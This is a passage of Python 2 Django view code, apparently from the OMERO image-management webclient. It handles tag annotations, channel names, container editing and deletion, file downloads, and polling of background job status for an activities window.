userMap[exp['id']] = exp
# For batch annotate, only include tags that user has added to all objects
if obj_count > 1:
# count my links
myLinkCount = {}
for t in taglist:
tid = t['id']
if tid not in myLinkCount:
myLinkCount[tid] = 0
if t['link']['owner']['id'] == self_id:
myLinkCount[tid] += 1
# filter
taglist = [t for t in taglist if myLinkCount[t['id']] == obj_count]
selected_tags = []
for tag in taglist:
linkOwnerId = tag['link']['owner']['id']
owner = userMap[linkOwnerId]
ownerName = "%s %s" % (
owner['firstName'],
owner['lastName'])
canDelete = True
created = tag['link']['date']
linkOwned = linkOwnerId == self_id
selected_tags.append(
(tag['id'], self_id, ownerName, canDelete, created, linkOwned))
# selected_tags is really a list of tag LINKS.
# May be several links per tag.id
selected_tags.sort(key=lambda x: x[0])
initial = {
'selected': selected,
'images': oids['image'],
'datasets': oids['dataset'],
'projects': oids['project'],
'screens': oids['screen'],
'plates': oids['plate'],
'acquisitions': oids['acquisition'],
'wells': oids['well']}
if request.method == 'POST':
# handle form submission
form_tags = TagsAnnotationForm(
initial=initial, data=request.POST.copy())
newtags_formset = NewTagsAnnotationFormSet(
prefix='newtags', data=request.POST.copy())
# Create new tags or Link existing tags...
if form_tags.is_valid() and newtags_formset.is_valid():
# filter down previously selected tags to the ones linked by
# current user
selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
# Remove duplicates from tag IDs
selected_tag_ids = list(set(selected_tag_ids))
post_tags = form_tags.cleaned_data['tags']
tags = [tag for tag in post_tags
if tag not in selected_tag_ids]
removed = [tag for tag in selected_tag_ids
if tag not in post_tags]
manager = BaseContainer(conn)
if tags:
manager.createAnnotationsLinks(
'tag',
tags,
oids
)
new_tags = []
for form in newtags_formset.forms:
new_tags.append(manager.createTagAnnotations(
form.cleaned_data['tag'],
form.cleaned_data['description'],
oids,
tag_group_id=form.cleaned_data['tagset'],
))
# only remove Tags where the link is owned by self_id
for remove in removed:
tag_manager = BaseContainer(conn, tag=remove)
tag_manager.remove([
"%s-%s" % (dtype, obj.id)
for dtype, objs in oids.items()
for obj in objs], tag_owner_id=self_id)
return JsonResponse({'added': tags,
'removed': removed,
'new': new_tags})
else:
# TODO: handle invalid form error
return HttpResponse(str(form_tags.errors))
else:
form_tags = TagsAnnotationForm(initial=initial)
newtags_formset = NewTagsAnnotationFormSet(prefix='newtags')
context = {
'form_tags': form_tags,
'newtags_formset': newtags_formset,
'selected_tags': selected_tags,
}
template = "webclient/annotations/tags_form.html"
context['template'] = template
return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
"""
Edit and save channel names
"""
image = conn.getObject("Image", imageId)
sizeC = image.getSizeC()
channelNames = {}
nameDict = {}
for i in range(sizeC):
cname = request.POST.get("channel%d" % i, None)
if cname is not None:
cname = smart_str(cname)[:255] # Truncate to fit in DB
channelNames["channel%d" % i] = cname
nameDict[i+1] = cname
# If the 'Apply to Dataset' button was used to submit...
if request.POST.get('confirm_apply', None) is not None:
# plate-123 OR dataset-234
parentId = request.POST.get('parentId', None)
if parentId is not None:
ptype = parentId.split("-")[0].title()
pid = long(parentId.split("-")[1])
counts = conn.setChannelNames(
ptype, [pid], nameDict, channelCount=sizeC)
else:
counts = conn.setChannelNames("Image", [image.getId()], nameDict)
rv = {"channelNames": channelNames}
if counts:
rv['imageCount'] = counts['imageCount']
rv['updateCount'] = counts['updateCount']
return rv
else:
return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(request, action, o_type=None, o_id=None,
conn=None, **kwargs):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in ("dataset", "project", "image", "screen", "plate",
"acquisition", "well", "comment", "file", "tag", "tagset"):
kw = {}
if o_type is not None and o_id > 0:
kw[str(o_type)] = long(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError, x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == 'addnewcontainer':
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == 'POST':
return HttpResponseRedirect(reverse("manage_action_containers",
args=["edit", o_type, o_id]))
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
# If Parent o_type is 'project'...
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug(
"Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data['name']
description = form.cleaned_data['description']
oid = manager.createDataset(name, description)
rdict = {'bad': 'false', 'id': oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
elif o_type == "tagset" and o_id > 0:
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
name = form.cleaned_data['name']
description = form.cleaned_data['description']
oid = manager.createTag(name, description)
rdict = {'bad': 'false', 'id': oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
elif request.POST.get('folder_type') in ("project", "screen",
"dataset", "tag", "tagset"):
# No parent specified. We can create orphaned 'project', 'dataset'
# etc.
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new: %s" % (str(form.cleaned_data)))
name = form.cleaned_data['name']
description = form.cleaned_data['description']
folder_type = request.POST.get('folder_type')
if folder_type == "dataset":
oid = manager.createDataset(
name, description,
img_ids=request.POST.getlist('image', None))
else:
# lookup method, E.g. createTag, createProject etc.
oid = getattr(manager, "create" +
folder_type.capitalize())(name, description)
rdict = {'bad': 'false', 'id': oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == 'add':
template = "webclient/public/share_form.html"
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
if o_type == "share":
img_ids = request.GET.getlist('image',
request.POST.getlist('image'))
images_to_share = list(conn.getObjects("Image", img_ids))
if request.method == 'POST':
form = BasketShareForm(
initial={'experimenters': experimenters,
'images': images_to_share},
data=request.POST.copy())
if form.is_valid():
images = form.cleaned_data['image']
message = form.cleaned_data['message']
expiration = form.cleaned_data['expiration']
members = form.cleaned_data['members']
# guests = request.POST['guests']
enable = form.cleaned_data['enable']
host = "%s?server=%i" % (request.build_absolute_uri(
reverse("load_template", args=["public"])),
int(conn.server_id))
shareId = manager.createShare(
host, images, message, members, enable, expiration)
return HttpResponse("shareId:%s" % shareId)
else:
initial = {
'experimenters': experimenters,
'images': images_to_share,
'enable': True,
'selected': request.GET.getlist('image')
}
form = BasketShareForm(initial=initial)
template = "webclient/public/share_form.html"
context = {'manager': manager, 'form': form}
elif action == 'edit':
# form for editing an Object. E.g. Project etc. TODO: not used now?
if o_type == "share" and o_id > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
'message': manager.share.message,
'expiration': "",
'shareMembers': manager.membersInShare,
'enable': manager.share.active,
'experimenters': experimenters}
if manager.share.getExpireDate() is not None:
initial['expiration'] = \
manager.share.getExpireDate().strftime("%Y-%m-%d")
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {'manager': manager, 'form': form}
elif hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/data/container_form.html"
form = ContainerForm(
initial={'name': obj.name, 'description': obj.description})
context = {'manager': manager, 'form': form}
elif action == 'save':
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == 'POST':
return HttpResponseRedirect(reverse("manage_action_containers",
args=["edit", o_type, o_id]))
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(initial={'experimenters': experimenters},
data=request.POST.copy())
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data['message']
expiration = form.cleaned_data['expiration']
members = form.cleaned_data['members']
# guests = request.POST['guests']
enable = form.cleaned_data['enable']
host = "%s?server=%i" % (request.build_absolute_uri(
reverse("load_template", args=["public"])),
int(conn.server_id))
manager.updateShareOrDiscussion(
host, message, members, enable, expiration)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {'share': manager, 'form': form}
else:
return HttpResponseServerError("Object does not exist")
elif action == 'editname':
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={'name': txtValue})
context = {'manager': manager, 'form': form}
else:
return HttpResponseServerError("Object does not exist")
elif action == 'savename':
# Save name edit in-line
if not request.method == 'POST':
return HttpResponseRedirect(reverse("manage_action_containers",
args=["edit", o_type, o_id]))
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data['name']
rdict = {'bad': 'false', 'o_type': o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == 'editdescription':
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(
initial={'description': obj.description})
context = {'manager': manager, 'form': form}
else:
return HttpResponseServerError("Object does not exist")
elif action == 'savedescription':
# Save editing of description in-line
if not request.method == 'POST':
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id))
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data['description']
manager.updateDescription(o_type, description)
rdict = {'bad': 'false'}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == 'remove':
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST['parent']
try:
manager.remove(parents.split('|'))
except Exception, x:
logger.error(traceback.format_exc())
rdict = {'bad': 'true', 'errs': str(x)}
return JsonResponse(rdict)
rdict = {'bad': 'false'}
return JsonResponse(rdict)
elif action == 'removefromshare':
image_id = request.POST.get('source')
try:
manager.removeImage(image_id)
except Exception, x:
logger.error(traceback.format_exc())
rdict = {'bad': 'true', 'errs': str(x)}
return JsonResponse(rdict)
rdict = {'bad': 'false'}
return JsonResponse(rdict)
elif action == 'delete':
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get('child'))
anns = toBoolean(request.POST.get('anns'))
try:
handle = manager.deleteItem(child, anns)
request.session['callback'][str(handle)] = {
'job_type': 'delete',
'delmany': False,
'did': o_id,
'dtype': o_type,
'status': 'in progress',
'error': 0,
'dreport': _formatReport(handle),
'start_time': datetime.datetime.now()}
request.session.modified = True
except Exception, x:
logger.error(
'Failed to delete: %r' % {'did': o_id, 'dtype': o_type},
exc_info=True)
rdict = {'bad': 'true', 'errs': str(x)}
else:
rdict = {'bad': 'false'}
return JsonResponse(rdict)
elif action == 'deletemany':
# Handles multi-delete from jsTree.
object_ids = {
'Image': request.POST.getlist('image'),
'Dataset': request.POST.getlist('dataset'),
'Project': request.POST.getlist('project'),
'Annotation': request.POST.getlist('tag'),
'Screen': request.POST.getlist('screen'),
'Plate': request.POST.getlist('plate'),
'Well': request.POST.getlist('well'),
'PlateAcquisition': request.POST.getlist('acquisition')}
child = toBoolean(request.POST.get('child'))
anns = toBoolean(request.POST.get('anns'))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s"
% (child, anns, object_ids))
try:
for key, ids in object_ids.iteritems():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
'job_type': 'delete',
'start_time': datetime.datetime.now(),
'status': 'in progress',
'error': 0,
'dreport': _formatReport(handle),
'dtype': key}
if len(ids) > 1:
dMap['delmany'] = len(ids)
dMap['did'] = ids
else:
dMap['delmany'] = False
dMap['did'] = ids[0]
request.session['callback'][str(handle)] = dMap
request.session.modified = True
except Exception, x:
logger.error(
'Failed to delete: %r' % {'did': ids, 'dtype': key},
exc_info=True)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {'bad': 'false'}
return JsonResponse(rdict)
context['template'] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
"""
Returns the specified original file as an http response. Used for
displaying text or png/jpeg etc files in browser
"""
# May be viewing results of a script run in a different group.
conn.SERVICE_OPTS.setOmeroGroup(-1)
orig_file = conn.getObject("OriginalFile", fileId)
if orig_file is None:
return handlerInternalError(
request, "Original File does not exists (id:%s)." % (fileId))
rsp = ConnCleaningHttpResponse(
orig_file.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
mimetype = orig_file.mimetype
if mimetype == "text/x-python":
mimetype = "text/plain" # allows display in browser
rsp['Content-Type'] = mimetype
rsp['Content-Length'] = orig_file.getSize()
if download:
downloadName = orig_file.name.replace(" ", "_")
downloadName = downloadName.replace(",", ".")
rsp['Content-Disposition'] = 'attachment; filename=%s' % downloadName
return rsp
@login_required()
def image_as_map(request, imageId, conn=None, **kwargs):
"""
Converts OMERO image into mrc.map file (using tiltpicker utils) and
returns the file
"""
from omero_ext.tiltpicker.pyami import mrc
from numpy import dstack, zeros, int8
image = conn.getObject("Image", imageId)
if image is None:
message = "Image ID %s not found in image_as_map" % imageId
logger.error(message)
return handlerInternalError(request, message)
imageName = image.getName()
downloadName = (imageName.endswith(".map") and imageName or
"%s.map" % imageName)
pixels = image.getPrimaryPixels()
# get a list of numpy planes and make stack
zctList = [(z, 0, 0) for z in range(image.getSizeZ())]
npList = list(pixels.getPlanes(zctList))
npStack = dstack(npList)
logger.info(
"Numpy stack for image_as_map: dtype: %s, range %s-%s"
% (npStack.dtype.name, npStack.min(), npStack.max()))
# OAV only supports 'float' and 'int8'. Convert anything else to int8
if (pixels.getPixelsType().value != 'float' or
('8bit' in kwargs and kwargs['8bit'])):
# scale from -127 -> 128 and conver to 8 bit integer
npStack = npStack - npStack.min() # start at 0
# range - 127 -> 128
npStack = (npStack * 255.0 / npStack.max()) - 127
a = zeros(npStack.shape, dtype=int8)
npStack = npStack.round(out=a)
if "maxSize" in kwargs and int(kwargs["maxSize"]) > 0:
sz = int(kwargs["maxSize"])
targetSize = sz * sz * sz
# if available, use scipy.ndimage to resize
if npStack.size > targetSize:
try:
import scipy.ndimage
from numpy import round
factor = float(targetSize) / npStack.size
factor = pow(factor, 1.0/3)
logger.info(
"Resizing numpy stack %s by factor of %s"
% (npStack.shape, factor))
npStack = round(
scipy.ndimage.interpolation.zoom(npStack, factor), 1)
except ImportError:
logger.info(
"Failed to import scipy.ndimage for interpolation of"
" 'image_as_map'. Full size: %s" % str(npStack.shape))
pass
header = {}
# Sometimes causes scaling issues in OAV.
# header["xlen"] = pixels.physicalSizeX * image.getSizeX()
# header["ylen"] = pixels.physicalSizeY * image.getSizeY()
# header["zlen"] = pixels.physicalSizeZ * image.getSizeZ()
# if header["xlen"] == 0 or header["ylen"] == 0 or header["zlen"] == 0:
# header = {}
# write mrc.map to temp file
import tempfile
temp = tempfile.NamedTemporaryFile(suffix='.map')
try:
mrc.write(npStack, temp.name, header)
logger.debug(
"download file: %r" % {'name': temp.name, 'size': temp.tell()})
originalFile_data = FileWrapper(temp)
rsp = HttpResponse(originalFile_data)
rsp['Content-Type'] = 'application/force-download'
# rsp['Content-Length'] = temp.tell()
rsp['Content-Length'] = os.path.getsize(temp.name)
rsp['Content-Disposition'] = 'attachment; filename=%s' % downloadName
temp.seek(0)
except Exception:
temp.close()
logger.error(traceback.format_exc())
return handlerInternalError(
request, "Cannot generate map (id:%s)." % (imageId))
return rsp
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
""" Returns the file annotation as an http response for download """
ann = conn.getObject("Annotation", annId)
if ann is None:
return handlerInternalError(
request, "Annotation does not exist (id:%s)." % (annId))
rsp = ConnCleaningHttpResponse(
ann.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
rsp['Content-Type'] = 'application/force-download'
rsp['Content-Length'] = ann.getFileSize()
rsp['Content-Disposition'] = ('attachment; filename=%s'
% (ann.getFileName().replace(" ", "_")))
return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
""" Downloads the 'Original Metadata' as a text file """
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
om = image.loadOriginalMetadata()
txtLines = ["[Global Metadata]"]
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[1]])
txtLines.append("[Series Metadata]")
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[2]])
rspText = "\n".join(txtLines)
rsp = HttpResponse(rspText)
rsp['Content-Type'] = 'application/force-download'
rsp['Content-Length'] = len(rspText)
rsp['Content-Disposition'] = 'attachment; filename=Original_Metadata.txt'
return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
"""
Page displays a simple "Preparing download..." message and redirects to
the 'url'.
We construct the url and query string from request: 'url' and 'ids'.
"""
format = request.GET.get('format', None)
if format is not None:
download_url = reverse('download_as')
zipName = 'Export_as_%s' % format
else:
download_url = reverse('archived_files')
zipName = 'OriginalFileDownload'
targetIds = request.GET.get('ids') # E.g. image-1|image-2
defaultName = request.GET.get('name', zipName) # default zip name
defaultName = os.path.basename(defaultName) # remove path
if targetIds is None:
raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
ids = targetIds.split("|")
fileLists = []
fileCount = 0
# If we're downloading originals, list original files so user can
# download individual files.
if format is None:
imgIds = []
wellIds = []
for i in ids:
if i.split("-")[0] == "image":
imgIds.append(i.split("-")[1])
elif i.split("-")[0] == "well":
wellIds.append(i.split("-")[1])
images = []
# Get images...
if imgIds:
images = list(conn.getObjects("Image", imgIds))
if len(images) == 0:
raise Http404("No images found.")
# Have a list of files per fileset (or per image without fileset)
fsIds = set()
fileIds = set()
for image in images:
fs = image.getFileset()
if fs is not None:
# Make sure we've not processed this fileset before.
if fs.id in fsIds:
continue
fsIds.add(fs.id)
files = list(image.getImportedImageFiles())
fList = []
for f in files:
if f.id in fileIds:
continue
fileIds.add(f.id)
fList.append({'id': f.id,
'name': f.name,
'size': f.getSize()})
if len(fList) > 0:
fileLists.append(fList)
fileCount = sum([len(l) for l in fileLists])
else:
# E.g. JPEG/PNG - 1 file per image
fileCount = len(ids)
query = "&".join([i.replace("-", "=") for i in ids])
download_url = download_url + "?" + query
if format is not None:
download_url = (download_url + "&format=%s"
% format)
context = {
'template': "webclient/annotations/download_placeholder.html",
'url': download_url,
'defaultName': defaultName,
'fileLists': fileLists,
'fileCount': fileCount
}
return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
"""
Loads the calendar which is displayed in the left panel of the history
page.
Shows current month by default. Filter by experimenter
"""
template = "webclient/history/calendar.html"
filter_user_id = request.session.get('user_id')
if year is not None and month is not None:
controller = BaseCalendar(
conn=conn, year=year, month=month, eid=filter_user_id)
else:
today = datetime.datetime.today()
controller = BaseCalendar(
conn=conn, year=today.year, month=today.month, eid=filter_user_id)
controller.create_calendar()
context = {'controller': controller}
context['template'] = template
return context
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
""" The data for a particular date that is loaded into the center panel """
template = "webclient/history/history_details.html"
# get page
page = int(request.GET.get('page', 1))
filter_user_id = request.session.get('user_id')
controller = BaseCalendar(
conn=conn, year=year, month=month, day=day, eid=filter_user_id)
controller.get_items(page)
context = {'controller': controller}
context['template'] = template
return context
def getObjectUrl(conn, obj):
"""
This provides a url to browse to the specified omero.model.ObjectI P/D/I,
S/P, FileAnnotation etc. used to display results from the scripting
service
E.g webclient/userdata/?path=image-12601
If the object is a file annotation, try to browse to the parent P/D/I
"""
base_url = reverse(viewname="load_template", args=['userdata'])
# if we have a File Annotation, then we want our URL to be for the parent
# object...
if isinstance(obj, omero.model.FileAnnotationI):
fa = conn.getObject("Annotation", obj.id.val)
for ptype in ['project', 'dataset', 'image']:
links = list(fa.getParentLinks(ptype))
if len(links) > 0:
obj = links[0].parent
break
if obj.__class__.__name__ in (
"ImageI", "DatasetI", "ProjectI", "ScreenI", "PlateI"):
otype = obj.__class__.__name__[:-1].lower()
base_url += "?show=%s-%s" % (otype, obj.id.val)
return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
"""Update a callback handle with key/value pairs"""
for key, value in kwargs.iteritems():
request.session['callback'][cbString][key] = value
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
"""
This refreshes callback handles (delete, scripts, chgrp etc) and provides
html to update Activities window & Progressbar.
The returned html contains details for ALL callbacks in web session,
regardless of their status.
We also add counts of jobs, failures and 'in progress' to update status
bar.
"""
in_progress = 0
failure = 0
new_results = []
_purgeCallback(request)
# If we have a jobId, just process that (Only chgrp supported)
jobId = request.GET.get('jobId', None)
if jobId is not None:
jobId = str(jobId)
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
rsp = prx.getResponse()
if rsp is not None:
rv = chgrpMarshal(conn, rsp)
rv['finished'] = True
else:
rv = {'finished': False}
return rv
# test each callback for failure, errors, completion, results etc
for cbString in request.session.get('callback').keys():
callbackDict = request.session['callback'][cbString]
job_type = callbackDict['job_type']
status = callbackDict['status']
if status == "failed":
failure += 1
request.session.modified = True
# update chgrp
if job_type == 'chgrp':
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
rsp = prx.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
["%s: %s" % (k, v) for k, v in
rsp.parameters.items()])
logger.error("chgrp failed with: %s"
% rsp_params)
update_callback(
request, cbString,
status="failed",
report="%s %s" % (rsp.name, rsp_params),
error=1)
elif isinstance(rsp, omero.cmd.OK):
update_callback(
request, cbString,
status="finished")
else:
in_progress += 1
finally:
prx.close(close_handle)
except:
logger.info(
"Activities chgrp handle not found: %s" % cbString)
continue
elif job_type == 'send_email':
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
callback = omero.callbacks.CmdCallbackI(
conn.c, prx, foreground_poll=True)
rsp = callback.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
["%s: %s" % (k, v)
for k, v in rsp.parameters.items()])
logger.error("send_email failed with: %s"
% rsp_params)
update_callback(
request, cbString,
status="failed",
report={'error': rsp_params},
error=1)
else:
total = (rsp.success + len(rsp.invalidusers) +
len(rsp.invalidemails))
update_callback(
request, cbString,
status="finished",
rsp={'success': rsp.success,
'total': total})
if (len(rsp.invalidusers) > 0 or
len(rsp.invalidemails) > 0):
invalidusers = [
e.getFullName() for e in list(
conn.getObjects(
"Experimenter",
rsp.invalidusers))]
update_callback(
request, cbString,
report={
'invalidusers': invalidusers,
'invalidemails': rsp.invalidemails
})
else:
in_progress += 1
finally:
callback.close(close_handle)
except:
logger.error(traceback.format_exc())
logger.info("Activities send_email handle not found: %s"
% cbString)
# update delete
elif job_type == 'delete':
if status not in ("failed", "finished"):
try:
handle = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
cb = omero.callbacks.CmdCallbackI(
conn.c, handle, foreground_poll=True)
rsp = cb.getResponse()
close_handle = False
try:
if not rsp: # Response not available
update_callback(
request, cbString,
error=0,
status="in progress",
dreport=_formatReport(handle))
in_progress += 1
else: # Response available
close_handle = True
new_results.append(cbString)
rsp = cb.getResponse()
err = isinstance(rsp, omero.cmd.ERR)
if err:
update_callback(
request, cbString,
error=1,
status="failed",
dreport=_formatReport(handle))
failure += 1
else:
update_callback(
request, cbString,
error=0,
status="finished",
dreport=_formatReport(handle))
finally:
cb.close(close_handle)
except Ice.ObjectNotExistException:
update_callback(
request, cbString,
error=0,
status="finished",
dreport=None)
except Exception, x:
logger.error(traceback.format_exc())
logger.error("Status job '%s'error:" % cbString)
update_callback(
request, cbString,
error=1,
status="failed",
dreport=str(x))
failure += 1
# update scripts
elif job_type == 'script':
# if error on runScript, the cbString is not a ProcessCallback...
if not cbString.startswith('ProcessCallback'):
continue # ignore
if status not in ("failed", "finished"):
logger.info("Check callback on script: %s" % cbString)
proc = omero.grid.ScriptProcessPrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
cb = omero.scripts.ProcessCallbackI(conn.c, proc)
# check if we get something back from the handle...
if cb.block(0): # ms.
cb.close()
try:
# we can only retrieve this ONCE - must save results
results = proc.getResults(0, conn.SERVICE_OPTS)
update_callback(request, cbString, status="finished")
new_results.append(cbString)
except Exception, x:
logger.error(traceback.format_exc())
continue
# value could be rstring, rlong, robject
rMap = {}
for key, value in results.items():
v = value.getValue()
if key in ("stdout", "stderr", "Message"):
if key in ('stderr', 'stdout'):
# just save the id of original file
v = v.id.val
update_kwargs = {key: v}
update_callback(request, cbString, **update_kwargs)
else:
if hasattr(v, "id"):
# do we have an object (ImageI,
# FileAnnotationI etc)
obj_data = {
'id': v.id.val,
'type': v.__class__.__name__[:-1]}
obj_data['browse_url'] = getObjectUrl(conn, v)
if v.isLoaded() and hasattr(v, "file"):
# try:
mimetypes = {
'image/png': 'png',
'image/jpeg': 'jpeg',
'text/plain': 'text'}
if v.file.mimetype.val in mimetypes:
obj_data['fileType'] = mimetypes[
v.file.mimetype.val]
obj_data['fileId'] = v.file.id.val
obj_data['name'] = v.file.name.val
# except:
# pass
if v.isLoaded() and hasattr(v, "name"):
# E.g Image, OriginalFile etc
name = unwrap(v.name)
if name is not None:
# E.g. FileAnnotation has null name
obj_data['name'] = name
rMap[key] = obj_data
else:
rMap[key] = v
update_callback(request, cbString, results=rMap)
else:
in_progress += 1
# having updated the request.session, we can now prepare the data for http
# response
rv = {}
for cbString in request.session.get('callback').keys():
# make a copy of the map in session, so that we can replace non
# json-compatible objects, without modifying session
rv[cbString] = copy.copy(request.session['callback'][cbString])
# return json (used for testing)
if 'template' in kwargs and kwargs['template'] == 'json':
for cbString in request.session.get('callback').keys():
rv[cbString]['start_time'] = str(
request.session['callback'][cbString]['start_time'])
rv['inprogress'] = in_progress
rv['failure'] = failure
rv['jobs'] = len(request.session['callback'])
return JsonResponse(rv) # json
jobs = []
new_errors = False
for key, data in rv.items():
# E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
# create id we can use as html id,
# E.g. 39f77932-c447-40d8-8f99-910b5a531a25
if len(key.split(" ")) > 0:
htmlId = key.split(" ")[0]
if len(htmlId.split("/")) > 1:
htmlId = htmlId.split("/")[1]
rv[key]['id'] = htmlId
rv[key]['key'] = key
if key in new_results:
rv[key]['new'] = True
if 'error' in data and data['error'] > 0:
new_errors = True
jobs.append(rv[key])
jobs.sort(key=lambda x: x['start_time'], reverse=True)
context = {
'sizeOfJobs': len(request.session['callback']),
'jobs': jobs,
'inprogress': in_progress,
'new_results': len(new_results),
'new_errors': new_errors,
'failure': failure}
context['template'] = "webclient/activities/activitiesContent.html"
return context
@login_required()
def activities_update(request, action, **kwargs):
"""
If the above 'action' == 'clean' then we clear jobs from
request.session['callback'] either a single job (if 'jobKey' is specified
in POST) or all jobs (apart from those in progress)
"""
request.session.modified = True
if action == "clean":
if 'jobKey' in request.POST:
jobId = request.POST.get('jobKey')
rv = {}
if jobId in request.session['callback']:
del request.session['callback'][jobId]
request.session.modified = True
rv['removed'] = True
else:
rv['removed'] = False
return JsonResponse(rv)
else:
for key, data in request.session['callback'].items():
if data['status'] != "in progress":
del request.session['callback'][key]
return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
""" Returns the experimenter's photo """
photo = conn.getExperimenterPhoto(oid)
return HttpResponse(photo, content_type='image/jpeg')
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
""" Delegates to webgateway, using share connection if appropriate """
kwargs['viewport_server'] = (
share_id is not None and reverse("webindex")+share_id or
reverse("webindex"))
# remove any trailing slash
